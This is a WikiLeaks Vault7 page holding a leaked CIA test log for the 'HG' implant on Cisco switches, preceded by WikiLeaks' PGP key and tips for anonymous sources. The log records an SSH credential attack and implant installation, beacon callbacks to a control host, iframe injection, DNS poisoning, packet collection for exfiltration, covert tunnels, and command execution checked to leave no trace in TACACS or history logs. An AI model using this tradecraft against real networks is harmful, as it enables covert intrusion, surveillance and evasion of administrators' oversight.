This key's fingerprint is A04C 5E09 ED02 B328 03EB 6116 93ED 732E 9231 8DBA

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQQNBFUoCGgBIADFLp+QonWyK8L6SPsNrnhwgfCxCk6OUHRIHReAsgAUXegpfg0b
rsoHbeI5W9s5to/MUGwULHj59M6AvT+DS5rmrThgrND8Dt0dO+XW88bmTXHsFg9K
jgf1wUpTLq73iWnSBo1m1Z14BmvkROG6M7+vQneCXBFOyFZxWdUSQ15vdzjr4yPR
oMZjxCIFxe+QL+pNpkXd/St2b6UxiKB9HT9CXaezXrjbRgIzCeV6a5TFfcnhncpO
ve59rGK3/az7cmjd6cOFo1Iw0J63TGBxDmDTZ0H3ecQvwDnzQSbgepiqbx4VoNmH
OxpInVNv3AAluIJqN7RbPeWrkohh3EQ1j+lnYGMhBktX0gAyyYSrkAEKmaP6Kk4j
/ZNkniw5iqMBY+v/yKW4LCmtLfe32kYs5OdreUpSv5zWvgL9sZ+4962YNKtnaBK3
1hztlJ+xwhqalOCeUYgc0Clbkw+sgqFVnmw5lP4/fQNGxqCO7Tdy6pswmBZlOkmH
XXfti6hasVCjT1MhemI7KwOmz/KzZqRlzgg5ibCzftt2GBcV3a1+i357YB5/3wXE
j0vkd+SzFioqdq5Ppr+//IK3WX0jzWS3N5Lxw31q8fqfWZyKJPFbAvHlJ5ez7wKA
1iS9krDfnysv0BUHf8elizydmsrPWN944Flw1tOFjW46j4uAxSbRBp284wiFmV8N
TeQjBI8Ku8NtRDleriV3djATCg2SSNsDhNxSlOnPTM5U1bmh+Ehk8eHE3hgn9lRp
2kkpwafD9pXaqNWJMpD4Amk60L3N+yUrbFWERwncrk3DpGmdzge/tl/UBldPoOeK
p3shjXMdpSIqlwlB47Xdml3Cd8HkUz8r05xqJ4DutzT00ouP49W4jqjWU9bTuM48
LRhrOpjvp5uPu0aIyt4BZgpce5QGLwXONTRX+bsTyEFEN3EO6XLeLFJb2jhddj7O
DmluDPN9aj639E4vjGZ90Vpz4HpN7JULSzsnk+ZkEf2XnliRody3SwqyREjrEBui
9ktbd0hAeahKuwia0zHyo5+1BjXt3UHiM5fQN93GB0hkXaKUarZ99d7XciTzFtye
/MWToGTYJq9bM/qWAGO1RmYgNr+gSF/fQBzHeSbRN5tbJKz6oG4NuGCRJGB2aeXW
TIp/VdouS5I9jFLapzaQUvtdmpaeslIos7gY6TZxWO06Q7AaINgr+SBUvvrff/Nl
l2PRPYYye35MDs0b+mI5IXpjUuBC+s59gI6YlPqOHXkKFNbI3VxuYB0VJJIrGqIu
Fv2CXwy5HvR3eIOZ2jLAfsHmTEJhriPJ1sUG0qlfNOQGMIGw9jSiy/iQde1u3ZoF
so7sXlmBLck9zRMEWRJoI/mgCDEpWqLX7hTTABEBAAG0x1dpa2lMZWFrcyBFZGl0
b3JpYWwgT2ZmaWNlIEhpZ2ggU2VjdXJpdHkgQ29tbXVuaWNhdGlvbiBLZXkgKFlv
dSBjYW4gY29udGFjdCBXaWtpTGVha3MgYXQgaHR0cDovL3dsY2hhdGMzcGp3cGxp
NXIub25pb24gYW5kIGh0dHBzOi8vd2lraWxlYWtzLm9yZy90YWxrKSA8Y29udGFj
dC11cy11c2luZy1vdXItY2hhdC1zeXN0ZW1Ad2lraWxlYWtzLm9yZz6JBD0EEwEK
ACcCGwMFCwkIBwMFFQoJCAsFFgIDAQACHgECF4AFAlb6cdIFCQOznOoACgkQk+1z
LpIxjbrlqh/7B2yBrryWhQMGFj+xr9TIj32vgUIMohq94XYqAjOnYdEGhb5u5B5p
BNowcqdFB1SOEvX7MhxGAqYocMT7zz2AkG3kpf9f7gOAG7qA1sRiB+R7mZtUr9Kv
fQSsRFPb6RNzqqB9I9wPNGhBh1YWusUPluLINwbjTMnHXeL96HgdLT+fIBa8ROmn
0fjJVoWYHG8QtsKiZ+lo2m/J4HyuJanAYPgL6isSu/1bBSwhEIehlQIfXZuS3j35
12SsO1Zj2BBdgUIrADdMAMLneTs7oc1/PwxWYQ4OTdkay2deg1g/N6YqM2N7rn1W
7A6tmuH7dfMlhcqw8bf5veyag3RpKHGcm7utDB6k/bMBDMnKazUnM2VQoi1mutHj
kTCWn/vF1RVz3XbcPH94gbKxcuBi8cjXmSWNZxEBsbirj/CNmsM32Ikm+WIhBvi3
1mWvcArC3JSUon8RRXype4ESpwEQZd6zsrbhgH4UqF56pcFT2ubnqKu4wtgOECsw
K0dHyNEiOM1lL919wWDXH9tuQXWTzGsUznktw0cJbBVY1dGxVtGZJDPqEGatvmiR
o+UmLKWyxTScBm5o3zRm3iyU10d4gka0dxsSQMl1BRD3G6b+NvnBEsV/+KCjxqLU
vhDNup1AsJ1OhyqPydj5uyiWZCxlXWQPk4p5WWrGZdBDduxiZ2FTj17hu8S4a5A4
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
J3x7gtxUMkTadELqwY6hrU8=
=BLTH
-----END PGP PUBLIC KEY BLOCK-----
		

Contact

If you need help using Tor you can contact WikiLeaks for assistance in setting it up using our simple webchat available at: https://wikileaks.org/talk

If you can use Tor, but need to contact WikiLeaks for other reasons use our secured webchat available at http://wlchatc3pjwpli5r.onion

We recommend contacting us over Tor if you can.

Tor

Tor is an encrypted anonymising network that makes it harder to intercept internet communications, or see where communications are coming from or going to.

In order to use the WikiLeaks public submission system as detailed above you can download the Tor Browser Bundle, which is a Firefox-like browser available for Windows, Mac OS X and GNU/Linux and pre-configured to connect using the anonymising system Tor.

Tails

If you are at high risk and you have the capacity to do so, you can also access the submission system through a secure operating system called Tails. Tails is an operating system launched from a USB stick or a DVD that aim to leaves no traces when the computer is shut down after use and automatically routes your internet traffic through Tor. Tails will require you to have either a USB stick or a DVD at least 4GB big and a laptop or desktop computer.

Tips

Our submission system works hard to preserve your anonymity, but we recommend you also take some of your own precautions. Please review these basic guidelines.

1. Contact us if you have specific problems

If you have a very large submission, or a submission with a complex format, or are a high-risk source, please contact us. In our experience it is always possible to find a custom solution for even the most seemingly difficult situations.

2. What computer to use

If the computer you are uploading from could subsequently be audited in an investigation, consider using a computer that is not easily tied to you. Technical users can also use Tails to help ensure you do not leave any records of your submission on the computer.

3. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

After

1. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

2. Act normal

If you are a high-risk source, avoid saying anything or doing anything after submitting which might promote suspicion. In particular, you should try to stick to your normal routine and behaviour.

3. Remove traces of your submission

If you are a high-risk source and the computer you prepared your submission on, or uploaded it from, could subsequently be audited in an investigation, we recommend that you format and dispose of the computer hard drive and any other storage media you used.

In particular, hard drives retain data after formatting which may be visible to a digital forensics team and flash media (USB sticks, memory cards and SSD drives) retain data even after a secure erasure. If you used flash media to store sensitive data, it is important to destroy the media.

If you do this and are a high-risk source you should make sure there are no traces of the clean-up, since such traces themselves may draw suspicion.

4. If you face legal action

If a legal action is brought against you as a result of your submission, there are organisations that may help you. The Courage Foundation is an international organisation dedicated to the protection of journalistic sources. You can find more details at https://www.couragefound.org.

WikiLeaks publishes documents of political or historical importance that are censored or otherwise suppressed. We specialise in strategic global publishing and large archives.

The following is the address of our secure site where you can anonymously upload your documents to WikiLeaks editors. You can only access this submissions system through Tor. (See our Tor tab for more information.) We also advise you to read our tips for sources before submitting.

wlupld3ptjvsgwqw.onion
Copy this address into your Tor browser. Advanced users, if they wish, can also add a further layer of encryption to their submission using our public PGP key.

If you cannot use Tor, or your submission is very large, or you have specific requirements, WikiLeaks provides several alternative methods. Contact us to discuss how to proceed.

Vault7: CIA Hacking Tools Revealed

Navigation: » Directory » Network Devices Branch (NDB) » Network Devices Branch » Operations/Testing » JQJTHRESHER


Owner: User #71467

Aquaman-5h HG 3.3.1 - Full Test

Aquaman-5h HG 3.3.1 - Full Test

Xetrron delivered Aquaman-5h HG 3.3.1 with a fix to EAREnterprise Archive 5244 (snooping causing err-disable).  Plan is to perform a full test of this Aquaman delivery.

Testing Summary

Completed

  • HG Base - includes install/uninstall. command and control, ci profile, boundary test
  • EAR 5244 fix verified
  • SMITE - mitm create http_iframe
  • DIVRT - mitm create dns_replace_ip
  • ARP survey - socket get_arp_survey_data
  • ARP responder - socket get_arp_responder_activity
  • Scavenger - Packet Collection - collect rule
  • ACE module - cmd exec
  • Drillbit/Dualor - Covert Tunnel testing
  • CPU Scaling - Curveball - device cpu
  • Covert Action - Reboot and kill soft

For Follow-Up

  • Need to compare files from CIConcern Profile tests
  • Five second CPU peaks are lower with HG installed than without - ~7-8% versus 11-13% - evident on show proc cpu hist.  Confirmed that this does not occur with just IACInternational Access Code installed.  In the chart below, on the right was when switch booted up, I installed IACInternational Access Code at the 67% User #75209, and I installed HG at the 24% User #75210.  After that it, it stays at 7%.

                                        1  211 1111111111111111 11611111111111111111
        7777777777777727744281112221122111211722710122111110112211

    CPU% per minute (last 60 minutes)
  • CPU scaling does not seem to affect five second interrupt utilization
  • CPU scaling does not hide utilization on individual processes - can be evident from show proc cpu sorted that sum of processes below add up to more than total reported at top
  • SSHIAC attack logs an SNMPSimple Network Management Protocol trap for configuration change
  • Usability feedback - it is confusing that some modules are started and stopped by different names.  For example, "module stop ACE" will stop the ACEApplication Control Engine (Module) module, but "module start ACEMod.mod" starts.  Tunnel is the same way - "module stop Tunnel" to stop, but "module start CovertTunnel.mod" to start.
  • Scramble - output of "scramble status" shows more Matched Packets than we set - seems to count packets that are replies to traffic that was matched.

Remaining Tests

  • Auto Exfiltration tests
  • Covert Data Collection to Drop Point tests
  • DNS Check-in
  • Memory cloaking
  • Packet Collection to Drop Point
  • Packet scambler
  • RFS test
  • Redirection
  • Performance tests
  • Ad-hoc tests
  • Comms over other ports/protocols?
  • Do we need to test HG in Script Mode?

 

Progress/Notes

4/16/15

  1. Collect Baseline information for use in later comparisons

    1. Deleted all previous crashinfo files from flash card of Target Device
    2. Reloaded Target Device
    3. Collected baseline files with output of show tech, dir all, show mem and CPU, show log
      1. Used memory - 26975916 (b)
      2. CPU - 5%/0%; one minute: 6%; five minutes: 6%
    4. Ran RANCID - collected version 1.6
  2. Install/Uninstall HG without leave behind

    1. SSHIAC attack - ./sshiac --ip 172.31.255.14:22 --l cisco:cisco password
      1. LG EC-125 DHDiffie-Hellman encryption EC-60 EC-159 M - these codes are acceptable per readme
      2. Observed CPU during attack: 46% highest spike
      3. Used memory after SSHIAC attack - 26966496 (b)
    2. Install HG
      1. Left the interpacket delay at 1s (not directed to change it in readme, and I'm following the readme)
      2. hg_start - result success - Result: 0x00000001
      3. Observed CPU during install: 19% highest CPU spike
      4. Used memory after HG install - 29893996 (b)
      5. no commands from attack or install observed in show history
    3. Establish HG Comms
      1. Edited aquaman-5h.txt file - replaced <INT> with eth0 and <IP TO TRIGGER> with 192.168.21.10
      2. Ran prep-ct.sh
      3. Established CTCounter Terrorism session - Observed 19% spike during SSLSecure Socket Layer handshake
        1. beacon call_base_back https 172.20.12.22 443
      4. Used memory after CTCounter Terrorism session - 29863488 (b)
      5. Hit tab twice:

        [192.168.21.10]>
        aliases ca collect device encryption https mitm packet redir tun
        beachhead capability communication dns file ilm mode process scramble verbosity
        beacon cmd compression ebroker filesystem memory module quit socket web

            1. Capability Module Installed?
              SMITE (iframe injection) FilterBroker Yes
              Scavenger (Packet Collector)    
              Beacon    
              Ramjet (Data Collector) DataCollection No
              Thundercracker (automated exfil)    
              Mixmaster (packet scrambler)    
              ACE (command execution) ACE Yes
              Drillbit (covert tunnel) Tunnel Yes
              DNS Check-in    
              Scrapper (redirector)    
              DIVRT (dns poison) FilterBroker Yes
              Snooping   Yes
              Trigger   Yes
              ARP Survey (socket)   Yes
                   
                   
                   
                   
      6. HG Base version 3.3.1
    4. Uninstall HG
      1. device uninstall_hg -mp -f
      2. no syslog messages generated
      3. Used memory after uninstall 26954800 (b)
      4. Observed CPU during uninstall - 12%
      5. Output from show proc cpu history - shows slightly lower peak CPU for one minute with HG installed (7-8% with HG vs 9-11% without HG)
      6. After uninstall - CPU utilization for five seconds: 5%/0%; one minute: 6%; five minutes: 6%4/17/15

  3. Install/Uninstall HG with leave behind

    1. Reloaded to start with a clean Target Device
    2. SSHIAC attacked successfully
    3. Installed hg with leave behind
    4. No syslogs, cpu and mem as expected, nothing alerting in show history
    5. Establish HG comms - success, no alerting events
    6. Uninstall HG
      1. device uninstall_hg -f
      2. After uninstall, was able to successfully communicate with remote - broad
    7. Reinstall HG
    8. hg_start_leave_behind - success
      1. Established comms
    9. device uninstall_hg -mp -f
  4. Basic command and control

    1. module show - modules running
    2. module stop Trigger - success
    3. module start Trigger.mod - success
    4. ilm refresh - success
    5. module show - success - Trigger module running
  5. Hit tab key to verify output of available commands

    1. mitm present, collect present - refer to table in 2c for complete listing
    2. dns show, web show, https show - snoop enabled for all three
    3. dns get_snooped_host_list_client 0 100 - seeds host in snooped list
  6. Boundary Test

    1. Run through list in HG Base Smoke Test Procedure - all failed gracefully
  7. CI Profile

    1. Collect output for comparison before install, with hg and after uninstall of hg- collected output in new files, will compare to previous test output
    2. Added to Rancid and ran once with HG, then uninstalled hg, reloaded switch, and ran rancid again to compare
    3. RANCID - ran with HG installed - no change to config, still on version 1.6
    4. RANCID - ran after uninstall - no change, still on version 1.6
  8. Test Fix for EAREnterprise Archive 5244 - err-disable condition

    1. Reloaded to start with a clean Target Device
    2. SSHIAC and HG install
    3. Verify Seeds Traffic running and verify no CTCounter Terrorism session with HG
    4. Perform 10x service network restarts on Seeds VM
    5. Establish CTCounter Terrorism session
    6. Perform 10x service network restarts on Seeds VM
    7. No err-disable condition observed
  9. SMITE Smoke Test - following documented HG 3.3.0 SMITE Capability Smoke Test Procedure

    1. Start with a clean, reloaded 2960-S
    2. SSHIAC attack and HG install
    3. Established CTCounter Terrorism session
    4. Completed module control test - stop, start - did not complete module delete and reload test
    5. Did not test module persistence
    6. Created SMITE rule - mitm create http_iframe 192.168.21.10 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk
    7. Iframe is injected into web page, viewed in source URL
    8. Able to attach in Windex and view secrets.txt
    9. Deleted mitm rule - iframe no longer injected
  10. Smoke Test - socket get_arp_survey_data

    1. Reload switch to start with a clean Target Device
    2. SSHIAC attack and install HG
    3. Establish CTCounter Terrorism session
    4. type socket get_arp_survey_data:

      [192.168.21.10]> socket get_arp_survey_data
      [Success]
      Vlan: 1
      Sender Protocol Address Sender Hardware Address Target Protocol Address Time Last Updated
      192.168.21.10 00:50:56:88:25:6d 192.168.21.1 2015-04-17T11:59:48Z
      192.168.21.1 00:11:bb:89:21:c4 172.31.255.1 2015-04-17T11:59:07Z
      192.168.21.10 00:50:56:88:25:6d 192.168.21.10 2015-04-17T11:39:58Z
      0.0.0.0 00:50:56:88:25:6d 192.168.21.10 2015-04-17T11:39:52Z

    5. socket get_arp_responder_status shows ARPAddress Resolution Protocol responder enabled Yes
    6. socket clear_arp_survey_data
    7. Checked socket get_arp_survey_data again and only 1 entry now, all re-appeared after service network restart on seeds
  11. Smoke Test - Collect Capability
    1. Establish CTCounter Terrorism Session with HG
    2. Collect create 192.168.21.10 255.255.255.0 0 65535 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 0 65535 tcp -en
    3. This rule captures Seed traffic
    4. In Listen window, observed "collect success received collected data" messages with job numbers
    5. Collect status showed active sessions and captured sessions
    6. Typed collect disable 8 to disable the collection rule
    7. Collect status showed 0 bytes buffered
    8. Viewed collected data in /Logs by converting to PCAPPacket capture format with ExfilParsh.sh - saw our seeds data
  12. Smoke Test - ACEApplication Control Engine (Module) Capability

    1. Set up for test - configured Target Device for use with AAASecurity Server from Cisco Server
    2. Verified that Target Device is logging commands to AAASecurity Server from Cisco server log - /var/log/tac_plus.acct
    3. Established CTCounter Terrorism session with HG
    4. In trigger window, ran "capability show" which confirms ACEApplication Control Engine (Module) v24 is installed.
    5. In trigger window, ran "module show" which confirms the same as above and that the module is "running".
    6. In trigger window, issued "module restart default:ACE.mod" and received error stating that it was an invalid module name despite it being what showed in the previous output.
    7. In trigger window, issued "module stop default:ACE.mod" and received the same error above.
    8. Previously configured TACACS+ server

    9. Configured the 2960S target as follows for AAA:

      1. aaa new-model 
      2. aaa authentication password-prompt Password: 
      3. aaa authentication username-prompt Login: 
      4. aaa authentication login default local 
      5. aaa authentication enable default enable 
      6. aaa authorization exec default local 
      7. aaa accounting exec default none
        aaa accounting commands 0 default start-stop group tacacs+
        aaa accounting commands 1 default start-stop group tacacs+
        aaa accounting commands 2 default start-stop group tacacs+
        aaa accounting commands 3 default start-stop group tacacs+
        aaa accounting commands 4 default start-stop group tacacs+
        aaa accounting commands 5 default start-stop group tacacs+
        aaa accounting commands 6 default start-stop group tacacs+
        aaa accounting commands 7 default start-stop group tacacs+
        aaa accounting commands 8 default start-stop group tacacs+
        aaa accounting commands 9 default start-stop group tacacs+
        aaa accounting commands 10 default start-stop group tacacs+
        aaa accounting commands 11 default start-stop group tacacs+
        aaa accounting commands 12 default start-stop group tacacs+
        aaa accounting commands 13 default start-stop group tacacs+
        aaa accounting commands 14 default start-stop group tacacs+
        aaa accounting commands 15 default start-stop group tacacs+
      8. tacacs-server host 10.9.8.25
      9. tacacs-server directed-request
    10. On tacacs server run: #tail -f /var/log/tac_plus.acct

    11. ssh to target 2960S: ssh -l root 172.31.255.14  [password=password]

      1. tacacs console shows login via ssh with other associate information
    12. Run various show commands via ssh session and confirm they show in the tacacs log as expected. [sh run, sh ver, sh clock, sh ip int br, sh int status, sh flash, sh users all]
    13. Cleared log file on tacacs and set up new tail of log file: #tail -f /var/log/tac_plus.acct
    14. From HG trigger window, run similar show commands as above and confirm they do NOT/NOT showing on tacacs log:
      1. HG trigger> cmd exec "show run"
      2. HG trigger> cmd exec "sh config"
      3. HG trigger> cmd exec "sh vlan"
      4. HG trigger> cmd exec "sh user"
      5. HG trigger> cmd exec "dir flash"
      6. HG trigger> cmd exec "sh clock"
      7. Enter a native command that requires a series of commands:
      8. HG trigger> cmd exec "sh ip int br"
      9. HG trigger> cmd exec "sh configuration id"
      10. HG trigger> cmd exec "sh dhcp server"
      11. HG trigger> cmd exec "sh int switch"
      12. HG trigger> cmd exec "sh int counters"
      13. HG trigger> cmd exec "sh int counters errors"
      14. HG trigger> cmd exec "sh int accounting"
      15. HG trigger> cmd exec "sh int irb"
      16. HG trigger> cmd exec "sh int mtu module 1"
      17. HG trigger> cmd exec "traceroute 1.1.1.1"  = success, with traceroute output
      18. HG trigger> cmd exec "ping 1.1.1.1" = success with round trip statistics
      19. HG trigger> cmd exec "traceroute 3.3.3.3" = successful in that output shows to a destination that cannot be reached
      20. HG trigger> cmd exec "ping 3.3.3.3" = successful in that out put of 0 replies is received
      21. Execute invalid commands and verify they fail gracefully:
      22. HG trigger> cmd exec "show test"
      23. HG trigger> cmd exec "sh home"
      24. HG trigger> cmd exec "traceroute 3.3.3.3"
    15. ssh back to target 2960S and confirm that Tacacs logs the connection. Run "sh history" and verify no commands executed via HG show.
    16. Load JQJThresher test on the IXIA which will run 85mbps of throughput through the test network that has 100mb link connecting the 3750G core and the 2960S for 10 minutes.
      1. During the IXIA throughput test, execute the "show" and other commands previously listed
        1. All commands completed successfully. No output on Tacacs log or Show History on device.
  13. Smoke test and functional Tunnel/Drillbit/Dualer capability

    1. Establish Dualer tunner from 192.168.21.12 tap IP on 2960S to CT-ICON
      1. Edit hg/tools/dualor/config/dualor-endpoint.ini
        1. Change General Int to "eth0",
        2. Change Trigger IP to real to be a destination for trigger packet: "192.168.21.10"
        3. Ensure CommsH LocalPort = 444
      2. Edit hg/tools/dualor/config/dualor-callback.ini
        1. Change TapIPAddr to non-active IP on destination subnet = 192.168.21.12
        2. Change VLANVirtual Local Area Network to destination vlan = 1
        3. Change Remote = CTCounter Terrorism IP "172.20.12.22"
        4. Ensure port = 444
        5. Change IParams to impersonation IP = 192.168.21.10
        6. Change IParams MACApple Operating System (MACApple Operating System of impersonation IP) = 00:50:56:88:25:6d
        7. Change TTLTime To Live = 255
        8. Change VLANVirtual Local Area Network to impersonation vlan = 1
      3. Establish CTCounter Terrorism session to Aquament-5h instance on 2960S
      4. Start tunnel listener on port 444 from workspace terminal
        1. Run: hg/tools/dualor/linux# ./Dualor ../config/dualor-endpoint.ini
          1. Note: "Listening for clients on port 444..."
        2. From CTCounter Terrorism listen window: tun init tools/dualor/config/dualor-callback.ini
          1. Note: Receive successful SSLSecure Socket Layer Handshake in workspace listener window on port 444 with tap0 interface on CTCounter Terrorism with impersonated IP
        3. Add a route to ICON-CT for X.X.X.X (LVLT-GOGL-8-8-8[US])/24 to use tap0 interface - route add -net X.X.X.X (LVLT-GOGL-8-8-8[US])/24 dev tap0 (Gives CT-ICON session the ability to browse to website as 192.168.21.12)
          1. Note: TCPdump -i eth0 (From the X.X.X.XX (LVLT-GOGL-8-8-8[US]) webserver confirms source traffic as 192.168.21.12)
      5. Trigger from another HG implanted switch back through the tunnel of the 2960S to CT-ICON on 192.168.21.12
    2. Trigger and Callback through a HG Tunnel running Aquaman-3h on 2960(non S)
      1. Confirmed 2960#1 running 12.2(50)SE5
      2. Disabled setting in Aquaman-5h HG tunnel which will disable the tunnel if the tap IP becomes active (If necessary - only on version of HG that created tap0 interface. For this instance of the test, this does not need to be done)
        1. Edit hg/config/tunnel.ini and change DetectTAPSrcTraffic=Yes to No
        2. From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg and note output and DetectTAPSrcTraffic = Yes
        3. From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg tunnel.ini and note in the output that DetectTAPSrcTraffic has been changed to No
        4. From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg and note output and DetectTAPSrcTraffic = No
        5. From Aquaman-3h CutThroat (Listen window), type file put cfs/000000004B8FAF63.cfg default:000000004B8FAF63.cfg in order to load the new setting up to HG
        6. From Aquaman-3h CutThroat (Listen window), type module restart default:CovertTunnel.mod to restart the module
          1. This did not work initially and Xetron is aware of this problem.  To fix, try restarting again, and run ilm refresh.
      3. Implanted 2960#1 with Aquaman-3h delivery of HG
      4. Edited "target aliases" file with 192.168.0.101 target and procid = 0x10413440
      5. Edited "aquaman3h-txt to include:
        1. General > Interface: tap0
        2. Trigger address: 192.168.44.39
        3. CommsH: Local port = 446
      6. Established comms with Aquaman-3h from ICON-CT on port 446
        1. ilm listen aquman-3h.txt (in listen window - listening on 446)
        2. beacon call_me_back https 446 -ii 192.168.44.38 (in trigger window)
        3. Successful SSLSecure Socket Layer handshake and established comms.
        4. Verify tap0 traffic on Wireshark from CT-ICON
  14. ARP Survey  - Smoke Test

    1. Test the ability to collect host information
      1. In CT-ICON Listen window: socket get_arp_survey_data
        1. Note: HG collected a table of expected IP and associated MAC's
      2. Listen window: socket clear_arp_survey_data
        1. = success
